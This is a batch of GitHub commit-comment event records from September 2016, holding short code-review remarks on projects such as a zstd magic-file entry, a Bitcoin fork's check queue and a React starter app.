{"id":"4531801268","type":"CommitCommentEvent","actor":{"login":"grady404"},"repo":{"name":"cooper-anderson/Blockade"},"payload":{"comment":{"id":18939597,"position":null,"line":null,"path":null,"commit_id":"b4802d85c50d10b6d936c900040cadd4f8a13e4c","created_at":"2016-09-08T04:49:54Z","updated_at":"2016-09-08T04:49:54Z","body":"Just change it to \"indev\" or something, don't include a version number at all."}},"created_at":"2016-09-08T04:49:54Z"}
{"id":"4531802241","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939599,"position":null,"line":null,"path":null,"commit_id":"b54bc95208e439f66f1585b2b6cda9a92669bdf1","created_at":"2016-09-08T04:50:20Z","updated_at":"2016-09-08T04:50:20Z","body":"@ApacheThunder This is working code but it requires the twlBg patch..."}},"created_at":"2016-09-08T04:50:20Z"}
{"id":"4531804850","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"terrelln/file"},"payload":{"comment":{"id":18939608,"position":35,"line":254,"path":"magic/Magdir/compress","commit_id":"b1c9fb1e6cc76ba7a22098b88adab97257aa5394","created_at":"2016-09-08T04:51:25Z","updated_at":"2016-09-08T04:51:25Z","body":"Dictionary ID is a feature that only started with v0.7\r\nThis field can be removed from all versions <= v0.6"}},"created_at":"2016-09-08T04:51:25Z"}
{"id":"4531805747","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939610,"position":null,"line":null,"path":null,"commit_id":"b54bc95208e439f66f1585b2b6cda9a92669bdf1","created_at":"2016-09-08T04:51:47Z","updated_at":"2016-09-08T04:51:47Z","body":"Hmm try moving the REG_SCFG_CLK and REG_SCFG_EXT stuff above your flashcart_modifyAutorun function call."}},"created_at":"2016-09-08T04:51:47Z"}
{"id":"4531806443","type":"CommitCommentEvent","actor":{"login":"oangy"},"repo":{"name":"1exciting/BD_FET"},"payload":{"comment":{"id":18939613,"position":null,"line":null,"path":null,"commit_id":"056f9872acd9e8d47abf542def266834ed07ef9d","created_at":"2016-09-08T04:52:05Z","updated_at":"2016-09-08T04:52:05Z","body":"搜了一下，确实"}},"created_at":"2016-09-08T04:52:05Z"}
{"id":"4531812430","type":"CommitCommentEvent","actor":{"login":"NGPriest"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18939623,"position":null,"line":null,"path":null,"commit_id":"e92fa833745e301af88eb8e1f5e592c7d3283291","created_at":"2016-09-08T04:54:39Z","updated_at":"2016-09-08T04:54:39Z","body":"Getting this error, hopefully not related...\r\n\r\nInternalError: (1055, u\"Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'pokemongomapdb.t1.latitude' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by\")"}},"created_at":"2016-09-08T04:54:39Z"}
{"id":"4531813892","type":"CommitCommentEvent","actor":{"login":"braxtonmckee"},"repo":{"name":"ufora/ufora"},"payload":{"comment":{"id":18939626,"position":13,"line":284,"path":"packages/python/pyfora/pyAst/PyAstFreeVariableAnalyses.py","commit_id":"e4e87b30e645a54c47f323038db5a7811317dccc","created_at":"2016-09-08T04:55:19Z","updated_at":"2016-09-08T04:55:19Z","body":"@atzannes  I know this is insufficient. Can you take a look at it? The goal is to find member sequences 'x.y.z' and replace them with a single lookup 'x_y_z', but obeying all the rules. I'm sure I'm not doing it right when you have member accesses in child scopes etc."}},"created_at":"2016-09-08T04:55:19Z"}
{"id":"4531814573","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939628,"position":null,"line":null,"path":null,"commit_id":"b54bc95208e439f66f1585b2b6cda9a92669bdf1","created_at":"2016-09-08T04:55:36Z","updated_at":"2016-09-08T04:55:36Z","body":"Made no difference"}},"created_at":"2016-09-08T04:55:36Z"}
{"id":"4531817592","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939636,"position":null,"line":null,"path":null,"commit_id":"b54bc95208e439f66f1585b2b6cda9a92669bdf1","created_at":"2016-09-08T04:56:52Z","updated_at":"2016-09-08T04:56:52Z","body":"I'm out of idea. Try using the card reset function as it was defined in the commit where it worked for you (and having your dldi function moved back to where it was in arm9 as well)"}},"created_at":"2016-09-08T04:56:52Z"}
{"id":"4531823237","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"terrelln/file"},"payload":{"comment":{"id":18939649,"position":48,"line":267,"path":"magic/Magdir/compress","commit_id":"b1c9fb1e6cc76ba7a22098b88adab97257aa5394","created_at":"2016-09-08T04:59:12Z","updated_at":"2016-09-08T04:59:12Z","body":"Field Dictionary_ID from v0.7 and v0.8 should have compatible position and format.\r\nSo it looks fine,"}},"created_at":"2016-09-08T04:59:12Z"}
{"id":"4531823815","type":"CommitCommentEvent","actor":{"login":"ssharma"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":18939650,"position":null,"line":null,"path":null,"commit_id":"3ee311ab8790f743b1e7b85ed02bb3c53cfe339d","created_at":"2016-09-08T04:59:24Z","updated_at":"2016-09-08T04:59:24Z","body":"Thanks. Where can I download Camel CS lint file?"}},"created_at":"2016-09-08T04:59:24Z"}
{"id":"4531829310","type":"CommitCommentEvent","actor":{"login":"bakenezumi"},"repo":{"name":"ruzia/handsontable"},"payload":{"comment":{"id":18939656,"position":6,"line":327,"path":"src/editorManager.js","commit_id":"88ca0a373d61002390d91e155c66274f1ad2d3d3","created_at":"2016-09-08T05:01:30Z","updated_at":"2016-09-08T05:01:30Z","body":"`activeEditor && activeEditor.textareaParentStyle` の方がよさげです"}},"created_at":"2016-09-08T05:01:30Z"}
{"id":"4531829397","type":"CommitCommentEvent","actor":{"login":"JikkuJose"},"repo":{"name":"amalshehu/exercism-python"},"payload":{"comment":{"id":18939657,"position":null,"line":null,"path":null,"commit_id":"822a14dd313c643a057c161912d7b2f01377c839","created_at":"2016-09-08T05:01:32Z","updated_at":"2016-09-08T05:01:32Z","body":"Add space **after** commas, full stops & other punctuations."}},"created_at":"2016-09-08T05:01:32Z"}
{"id":"4531830598","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18939665,"position":null,"line":null,"path":null,"commit_id":"78a560767bce07f25b07b4b55e02a232269b393f","created_at":"2016-09-08T05:02:01Z","updated_at":"2016-09-08T05:02:01Z","body":"If both fields are equal, no exchange should be performed. Compare int3: https://github.com/vcmi/vcmi/blob/develop/lib/int3.h#L79 \r\n\r\nThe real issue is that primary skill condition should have priority over change, at least by my intention."}},"created_at":"2016-09-08T05:02:01Z"}
{"id":"4531835826","type":"CommitCommentEvent","actor":{"login":"sjclayton"},"repo":{"name":"sjclayton/YAPO"},"payload":{"comment":{"id":18939673,"position":null,"line":null,"path":null,"commit_id":"1e99d14111a3a46b2a6f21350fb8156753c96fde","created_at":"2016-09-08T05:04:07Z","updated_at":"2016-09-08T05:04:07Z","body":"Buttons are no longer all over the place and higher or lower than each other."}},"created_at":"2016-09-08T05:04:07Z"}
{"id":"4531840022","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18939679,"position":null,"line":null,"path":null,"commit_id":"cbe09331003dafa61609914849dd5f374a2a03e1","created_at":"2016-09-08T05:05:46Z","updated_at":"2016-09-08T05:05:46Z","body":"Need to recheck double accuracy based on programming class."}},"created_at":"2016-09-08T05:05:46Z"}
{"id":"4531842991","type":"CommitCommentEvent","actor":{"login":"oakwoodgates"},"repo":{"name":"oakwoodgates/maia_soledad-child"},"payload":{"comment":{"id":18939681,"position":null,"line":null,"path":null,"commit_id":"573daa2fdb1a0040ed11e2bd0d95142ac9d019d0","created_at":"2016-09-08T05:06:56Z","updated_at":"2016-09-08T05:06:56Z","body":"fixes oakwoodgates/mtollwc#15"}},"created_at":"2016-09-08T05:06:56Z"}
{"id":"4531847307","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"terrelln/file"},"payload":{"comment":{"id":18939686,"position":54,"line":273,"path":"magic/Magdir/compress","commit_id":"b1c9fb1e6cc76ba7a22098b88adab97257aa5394","created_at":"2016-09-08T05:08:39Z","updated_at":"2016-09-08T05:08:39Z","body":"Not sure if the file format allows usage of shift ('>>') operator.\r\nWithout it, determining the window size is going to be difficult.\r\n\r\nI would suggest to add \"content size\" field, which seems simpler to add,\r\nsince it's either a 0, 1, 2, 4 or 8 bytes field using little endian convention. "}},"created_at":"2016-09-08T05:08:39Z"}
{"id":"4531851578","type":"CommitCommentEvent","actor":{"login":"imufun"},"repo":{"name":"imufun/CanyonBunnyMain"},"payload":{"comment":{"id":18939695,"position":null,"line":null,"path":null,"commit_id":"3a5ba0c970842269cc1df78e1cc69bbeb086ffcb","created_at":"2016-09-08T05:10:24Z","updated_at":"2016-09-08T05:10:24Z","body":"page- 134 "}},"created_at":"2016-09-08T05:10:24Z"}
{"id":"4531852165","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"JeremyRubin/bitcoin"},"payload":{"comment":{"id":18939697,"position":9,"line":81,"path":"src/checkqueue.h","commit_id":"b6b661809f5830c2b8e97e51c617ffa3bca880f4","created_at":"2016-09-08T05:10:37Z","updated_at":"2016-09-08T05:10:37Z","body":"You need to std::forward all of the args..., otherwise the rvalues are lost and copies are made.\r\n```c++\r\nchecks.emplace_back(std::forward<Args>(args)...);\r\n```\r\nSame goes for all of the other param expansion, so I'll skip pointing them out"}},"created_at":"2016-09-08T05:10:37Z"}
{"id":"4531852225","type":"CommitCommentEvent","actor":{"login":"Chikakos"},"repo":{"name":"Chikakos/csaitoprogram"},"payload":{"comment":{"id":18939698,"position":null,"line":null,"path":null,"commit_id":"947a5cc369c4f8b5da176afdec2ed7d01311d374","created_at":"2016-09-08T05:10:38Z","updated_at":"2016-09-08T05:10:38Z","body":"翔平さま\r\n\r\n御確認ありがとうございます！\r\nすみません。「insert_into.php」に関して、間違えてお送りしてしまいました。\r\nこちら`$con`など、わからないコードばかりでphpなのかhtmlなのかもわからず、断念したデータでしたので、「input_page.html」「regist.php」を使い入力を試みました。\r\n\r\nちなみに、「insert_into.php」のURLお送りいたします。\r\n[http://www.flatflag.nir87.com/insert-942](url)\r\n\r\n御確認のほどよろしくお願い致します。"}},"created_at":"2016-09-08T05:10:38Z"}
{"id":"4531854362","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"Contortrix/device-sony-common"},"payload":{"comment":{"id":18939700,"position":null,"line":null,"path":null,"commit_id":"9fddc1bc6723a912374e4b78aa3863598dfbc5dc","created_at":"2016-09-08T05:11:28Z","updated_at":"2016-09-08T05:11:28Z","body":"@AdFad666 is TagGoogle compatible with rhine ?"}},"created_at":"2016-09-08T05:11:28Z"}
{"id":"4531856736","type":"CommitCommentEvent","actor":{"login":"jvrplmlmn"},"repo":{"name":"StackStorm/chef-stackstorm"},"payload":{"comment":{"id":18939711,"position":null,"line":null,"path":null,"commit_id":"7b2efca05b99f9f35a76b2ad19df62de482d6c72","created_at":"2016-09-08T05:12:28Z","updated_at":"2016-09-08T05:12:28Z","body":"👍 "}},"created_at":"2016-09-08T05:12:28Z"}
{"id":"4531856779","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"JeremyRubin/bitcoin"},"payload":{"comment":{"id":18939712,"position":5,"line":353,"path":"src/main.h","commit_id":"b6b661809f5830c2b8e97e51c617ffa3bca880f4","created_at":"2016-09-08T05:12:29Z","updated_at":"2016-09-08T05:12:29Z","body":"Note for later (not now), CCoins and CTransaction should be passed by value rather than const reference, since they're perfectly forwarded."}},"created_at":"2016-09-08T05:12:29Z"}
{"id":"4531858302","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18939715,"position":null,"line":null,"path":null,"commit_id":"3f58287086c12f3b83bb19dbb9ef6221492f928e","created_at":"2016-09-08T05:13:05Z","updated_at":"2016-09-08T05:13:05Z","body":"You have not written the comments for the cgUI but its alright as you said that you don't know about it."}},"created_at":"2016-09-08T05:13:05Z"}
{"id":"4531858891","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18939716,"position":null,"line":null,"path":null,"commit_id":"fd679b95d07cc68aa68b57b3de1ff0f40f24977c","created_at":"2016-09-08T05:13:19Z","updated_at":"2016-09-08T05:13:19Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/fd679b95d07cc68aa68b57b3de1ff0f40f24977c#commitcomment-18939311) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/d7c7c268c3d69204a543df96363f63c733687c0b/daily_2016_9_8/report.md). cc @jrevels"}},"created_at":"2016-09-08T05:13:19Z"}
{"id":"4531859343","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18939717,"position":null,"line":null,"path":null,"commit_id":"3f58287086c12f3b83bb19dbb9ef6221492f928e","created_at":"2016-09-08T05:13:30Z","updated_at":"2016-09-08T05:13:30Z","body":"Its alright for you to pull and then merge it with the master CodeBaseLine"}},"created_at":"2016-09-08T05:13:30Z"}
{"id":"4531860776","type":"CommitCommentEvent","actor":{"login":"williamnolan"},"repo":{"name":"axuno/MailMergeLib"},"payload":{"comment":{"id":18939719,"position":null,"line":null,"path":null,"commit_id":"418c305a1f519c8b298176d882224bfbb209e754","created_at":"2016-09-08T05:14:07Z","updated_at":"2016-09-08T05:14:07Z","body":"I'm trying to see how this effects package loading.  A couple concerns/observations:\r\n\r\n1) I don't see any kind of reference to package information (unless VS looks in the directory of the .csproj file - but in that case it should work either way)\r\n2) I have installed MailMergLib as an independent project, and if I want to work with it independently, I would simply open it with its own sln.  However, for debug purposes, I will add it to a solution containing various projects that reference it, and in that case MailMergeLib's sln will be superceded.\r\n\r\nI'm concerned whether the sln is necessary for proper package management, as I would be bypassing it in scenario #2 above.\r\n\r\nAdmittedly, I'm new at understanding the NuGet mechanism!  I'm encouraged by your work on this library, and want to make sure I get this stuff linked properly."}},"created_at":"2016-09-08T05:14:07Z"}
{"id":"4531861959","type":"CommitCommentEvent","actor":{"login":"ziyan-junaideen"},"repo":{"name":"jdeen/xkpassword"},"payload":{"comment":{"id":18939722,"position":7,"line":7,"path":".travis.yml","commit_id":"e2b84d14a05f19cee6296686cfb36c10a02cc22b","created_at":"2016-09-08T05:14:37Z","updated_at":"2016-09-08T05:14:37Z","body":"There was an issue using short version with 2.3 and the build was failing, for that used 2.3.1"}},"created_at":"2016-09-08T05:14:37Z"}
{"id":"4531863629","type":"CommitCommentEvent","actor":{"login":"DarioDaic"},"repo":{"name":"DarioDaic/perchapter"},"payload":{"comment":{"id":18939723,"position":null,"line":null,"path":null,"commit_id":"e312217e84a7ce3284fd98ab955a0f1dbee17f22","created_at":"2016-09-08T05:15:16Z","updated_at":"2016-09-08T05:15:16Z","body":"@mivanek hoces bacit oko na ovaj _storyline_spec.rb_ unit testic? straightforward je."}},"created_at":"2016-09-08T05:15:16Z"}
{"id":"4531865523","type":"CommitCommentEvent","actor":{"login":"mscheibe"},"repo":{"name":"ankane/blazer"},"payload":{"comment":{"id":18939726,"position":null,"line":null,"path":null,"commit_id":"139e7264a7f83308e0aef9b601f4b35418825977","created_at":"2016-09-08T05:16:00Z","updated_at":"2016-09-08T05:16:00Z","body":"💯 !"}},"created_at":"2016-09-08T05:16:00Z"}
{"id":"4531869667","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939734,"position":18,"line":14,"path":"ui/app.jsx","commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:17:39Z","updated_at":"2016-09-08T05:17:39Z","body":"`ReactDOM.findDOMNode` is redundant here. `this.refs.textInput` is already a DOM node, so you can just use:\r\n\r\n    const val = this.refs.textInput.value"}},"created_at":"2016-09-08T05:17:39Z"}
{"id":"4531870306","type":"CommitCommentEvent","actor":{"login":"basahun"},"repo":{"name":"basahun/Espressuino"},"payload":{"comment":{"id":18939737,"position":205,"line":205,"path":"Espressuino.ino","commit_id":"8f0beccd16b0aeb6d4836b55cd5d8d83a8b6bd5c","created_at":"2016-09-08T05:17:55Z","updated_at":"2016-09-08T05:17:55Z","body":"``fghfghfgh"}},"created_at":"2016-09-08T05:17:55Z"}
{"id":"4531871338","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939739,"position":null,"line":null,"path":null,"commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:18:19Z","updated_at":"2016-09-08T05:18:19Z","body":"Are you using the linter? It's a pain at first but trust me you're going to see that it'll save you time."}},"created_at":"2016-09-08T05:18:19Z"}
{"id":"4531871554","type":"CommitCommentEvent","actor":{"login":"cuviper"},"repo":{"name":"nikomatsakis/rayon"},"payload":{"comment":{"id":18939740,"position":114,"line":114,"path":"src/par_iter/option.rs","commit_id":"fbc8b470a6e06d656428c6f79a11327439ffa59c","created_at":"2016-09-08T05:18:24Z","updated_at":"2016-09-08T05:18:24Z","body":"Yeah, it's a degenerate case, but this is the best I can come up with if it did get called."}},"created_at":"2016-09-08T05:18:24Z"}
{"id":"4531871908","type":"CommitCommentEvent","actor":{"login":"NightFeather"},"repo":{"name":"NightFeather/pcmanx"},"payload":{"comment":{"id":18939741,"position":null,"line":null,"path":null,"commit_id":"18cce627e21077e9fb9ef190aad86dba831fd1cc","created_at":"2016-09-08T05:18:33Z","updated_at":"2016-09-08T05:18:33Z","body":"refer this to issue #83"}},"created_at":"2016-09-08T05:18:33Z"}
{"id":"4531872660","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939742,"position":9,"line":8,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:18:50Z","updated_at":"2016-09-08T05:18:50Z","body":"This is fine but `fetch` is now considered the standard for making ajax requests. "}},"created_at":"2016-09-08T05:18:50Z"}
{"id":"4531875282","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939746,"position":71,"line":69,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:19:57Z","updated_at":"2016-09-08T05:19:57Z","body":"If you use the \"fat arrow\", you don't have to use a closure (`_this = this`):\r\n\r\n    .then(result => {\r\n      this.setState({ movies: result.data.Search });\r\n    })"}},"created_at":"2016-09-08T05:19:57Z"}
{"id":"4531875656","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18939748,"position":44,"line":202,"path":"java/squeek/veganoption/helpers/FluidHelper.java","commit_id":"2aeb85dde4304e00ae9a1f1af520927749b23406","created_at":"2016-09-08T05:20:06Z","updated_at":"2016-09-08T05:20:06Z","body":"Yep, good catch."}},"created_at":"2016-09-08T05:20:06Z"}
{"id":"4531876580","type":"CommitCommentEvent","actor":{"login":"mbwk"},"repo":{"name":"mbwk/pyopendoc"},"payload":{"comment":{"id":18939749,"position":9,"line":9,"path":"pyopendoc/writer.py","commit_id":"be30230d3dccb25f3f74b5955a7380d85d02f65a","created_at":"2016-09-08T05:20:25Z","updated_at":"2016-09-08T05:20:25Z","body":"delete this"}},"created_at":"2016-09-08T05:20:25Z"}
{"id":"4531879393","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939752,"position":null,"line":null,"path":null,"commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:21:37Z","updated_at":"2016-09-08T05:21:37Z","body":"In your previous commit you used spaces, in this commit you use tabs. You should pick one and stick to it. For the code we'll be writing after this project, we're going to be using **2 spaces** so it might make sense for you to switch to that here."}},"created_at":"2016-09-08T05:21:37Z"}
{"id":"4531883230","type":"CommitCommentEvent","actor":{"login":"sultanxda"},"repo":{"name":"sultanxda/proprietary_vendor_oneplus"},"payload":{"comment":{"id":18939756,"position":null,"line":null,"path":null,"commit_id":"a1eea9a2beff967f040d9acc4ffb63876ce00bae","created_at":"2016-09-08T05:23:13Z","updated_at":"2016-09-08T05:23:13Z","body":"This is pretty much the vanilla HAL just compiled. I haven't made\nsignificant changes to it yet.\n\nThe camera HAL I've made that is the most heavily tweaked is my OnePlus X\ncamera HAL.\n\nOn Sep 6, 2016 3:14 PM, \"RonaldKepken\" <notifications@github.com> wrote:\n\n> Hey Sultan!\n> I hope I am not disturbing you. I would like to ask on the technical\n> details\n> of the changes to the Camera HAL. Did you just build the vanilla HAL from\n> CAF or did you do modifications?\n> I am interested on the technical side of this, since we are studying this\n> at university right now.\n> I really hope it's no secret, since it would be really helpful to\n> understand how you achieve these improvements.\n> I will probably make a presentation about it.\n> I can fully understand that you may not want to share it here in public.\n> If so, just quickly say that and I'll find another way to contact you in\n> private.\n>\n> Thank you very much in advance! I am looking forward to learning from you\n> :)\n>\n> Ronald Kepken\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sultanxda/proprietary_vendor_oneplus/commit/a1eea9a2beff967f040d9acc4ffb63876ce00bae#commitcomment-18919699>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC2Mi2Pz6tR6rvAyTAITK9G9zIb5e8WIks5qneXcgaJpZM4J2VyY>\n> .\n>\n"}},"created_at":"2016-09-08T05:23:13Z"}
{"id":"4531885724","type":"CommitCommentEvent","actor":{"login":"damencho"},"repo":{"name":"jitsi/jitsi-meet"},"payload":{"comment":{"id":18939766,"position":8,"line":9,"path":"css/_unsupported_browser.scss","commit_id":"4044e11da245521046364e49df8351ab2cda9fc3","created_at":"2016-09-08T05:24:16Z","updated_at":"2016-09-08T05:24:16Z","body":"Hum, if we are removing unsupported_browser.css we need to update unsupported_browser.html and also missing that file breaks debian build. "}},"created_at":"2016-09-08T05:24:16Z"}
{"id":"4531887341","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"basrieter/xbmc"},"payload":{"comment":{"id":18939768,"position":null,"line":null,"path":null,"commit_id":"c8e7101a3dd2a794a95d051fe7fca557ee0c3b36","created_at":"2016-09-08T05:24:58Z","updated_at":"2016-09-08T05:24:58Z","body":"great, can you PR this please"}},"created_at":"2016-09-08T05:24:58Z"}
{"id":"4531889178","type":"CommitCommentEvent","actor":{"login":"hcbviolet"},"repo":{"name":"hcbviolet/flat_circle"},"payload":{"comment":{"id":18939770,"position":null,"line":null,"path":null,"commit_id":"7215daec3b781bd7260ed4489b468d0d7dfb907c","created_at":"2016-09-08T05:25:43Z","updated_at":"2016-09-08T05:25:43Z","body":"Implemented for past dates, future needs to be done."}},"created_at":"2016-09-08T05:25:43Z"}
{"id":"4531890392","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939773,"position":31,"line":27,"path":"ui/app.jsx","commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:26:12Z","updated_at":"2016-09-08T05:26:12Z","body":"You were definitely right in wanting to pass _something_ in as a value to this input element. However, `this.userInput` is never defined, thus `value` will always be set to `undefined`. When `value` is undefined, the input element maintains its own state.\r\n\r\n    queryDB() {\r\n      console.log(this.state.userInput); // note that I don't have to access the DOM\r\n    }\r\n\r\n    handleChange = (e) => {\r\n      const userInput = e.target.value;\r\n      this.setState({ userInput });\r\n    }\r\n\r\n    render() {\r\n      <input value={this.state.userInput} onChange={this.handleChange} />\r\n    }"}},"created_at":"2016-09-08T05:26:12Z"}
{"id":"4531892282","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Mega-Engine-Fork"},"payload":{"comment":{"id":18939779,"position":null,"line":null,"path":null,"commit_id":"3d809c393005e8433cd7cc12bb372273b0e5234c","created_at":"2016-09-08T05:26:57Z","updated_at":"2016-09-08T05:26:57Z","body":"Adds enhancement #2 "}},"created_at":"2016-09-08T05:26:57Z"}
{"id":"4531894511","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939786,"position":13,"line":9,"path":"ui/app.jsx","commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:27:51Z","updated_at":"2016-09-08T05:27:51Z","body":"There's actually a shorthand way to do this when defining the `queryDB` function:\r\n\r\n    queryDB = () => {\r\n      ...\r\n    }"}},"created_at":"2016-09-08T05:27:51Z"}
{"id":"4531895230","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18939791,"position":null,"line":null,"path":null,"commit_id":"bd31c4070e49ca298017eb6cb26850ca71153010","created_at":"2016-09-08T05:28:03Z","updated_at":"2016-09-08T05:28:03Z","body":"A lot of intendation needs to be done @sapkotabishal10 "}},"created_at":"2016-09-08T05:28:03Z"}
{"id":"4531896083","type":"CommitCommentEvent","actor":{"login":"keeshaaw"},"repo":{"name":"keeshaaw/wildfly-quickstart"},"payload":{"comment":{"id":18939793,"position":null,"line":null,"path":null,"commit_id":"780e78a2a5ce1df69fd63753c50dc9fdfd9fdb69","created_at":"2016-09-08T05:28:26Z","updated_at":"2016-09-08T05:28:26Z","body":"Changed Hibernate3 example to use org.hibernate.ejb.HibernatePersistence since the WildFly default provider is now org.hibernate.jpa.HibernatePersistenceProvider"}},"created_at":"2016-09-08T05:28:26Z"}
{"id":"4531896128","type":"CommitCommentEvent","actor":{"login":"jarmstrong"},"repo":{"name":"alexcu/splashkit-core"},"payload":{"comment":{"id":18939794,"position":null,"line":null,"path":null,"commit_id":"a494ba0dbc86078dbeba24bd5838c59cca88dc64","created_at":"2016-09-08T05:28:27Z","updated_at":"2016-09-08T05:28:27Z","body":"It would be much better I think to not to try and create a static lib on Linux as it makes sense to keep things dynamic as people will install shared librarys via their package manager. I talked to Jake about this a little bit ago and skm should build a dynamic library on first pull and on any updates which is what the current linux swingame effectively does."}},"created_at":"2016-09-08T05:28:27Z"}
{"id":"4531898934","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939809,"position":28,"line":24,"path":"ui/app.jsx","commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:29:40Z","updated_at":"2016-09-08T05:29:40Z","body":"Traditional JavaScript applications rely heavily on the `id` tag in order to select elements from the DOM. In React, you use `refs` to expose DOM elements to your functions. You pretty much never have the need to use an `id` tag in your components."}},"created_at":"2016-09-08T05:29:40Z"}
{"id":"4531899285","type":"CommitCommentEvent","actor":{"login":"Cyan4973"},"repo":{"name":"terrelln/file"},"payload":{"comment":{"id":18939811,"position":54,"line":273,"path":"magic/Magdir/compress","commit_id":"b1c9fb1e6cc76ba7a22098b88adab97257aa5394","created_at":"2016-09-08T05:29:48Z","updated_at":"2016-09-08T05:29:48Z","body":"Reading the [documentation on magic numbers] ( http://linux.die.net/man/5/magic ),\r\nI see no shift (`>>`) operator,\r\nbut there are multiplication `*` and divisions `/`,\r\nwhich are fair enough replacements.\r\n\r\nFor example, it's possible to retrieve windowLog : \r\n- check if the window descriptor byte is present\r\n- windowLog value is : (byte / 8) + 10\r\n- for simplicity, check that mantissa is 0 : (byte & 7)\r\n- and then windowSize can be expressed as : \"1 << windowLog\"."}},"created_at":"2016-09-08T05:29:48Z"}
{"id":"4531901417","type":"CommitCommentEvent","actor":{"login":"hdknr"},"repo":{"name":"hdknr/annotated-django"},"payload":{"comment":{"id":18939820,"position":null,"line":null,"path":null,"commit_id":"b04cac7c3f92a21df2c7197ce449f2c25499ec23","created_at":"2016-09-08T05:30:37Z","updated_at":"2016-09-08T05:30:37Z","body":"vary_on_cookie などvaryデコレータが、 cache_page デコレータより先に実行されること"}},"created_at":"2016-09-08T05:30:37Z"}
{"id":"4531903159","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939825,"position":12,"line":8,"path":"ui/app.jsx","commit_id":"12ac1c0704bc5ecc072573fa9aca2887004cbe71","created_at":"2016-09-08T05:31:16Z","updated_at":"2016-09-08T05:31:16Z","body":"You don't need to pass context in here, if you're using a constructor you just need:\r\n\r\n    constructor(props) {\r\n      super(props);\r\n    }"}},"created_at":"2016-09-08T05:31:16Z"}
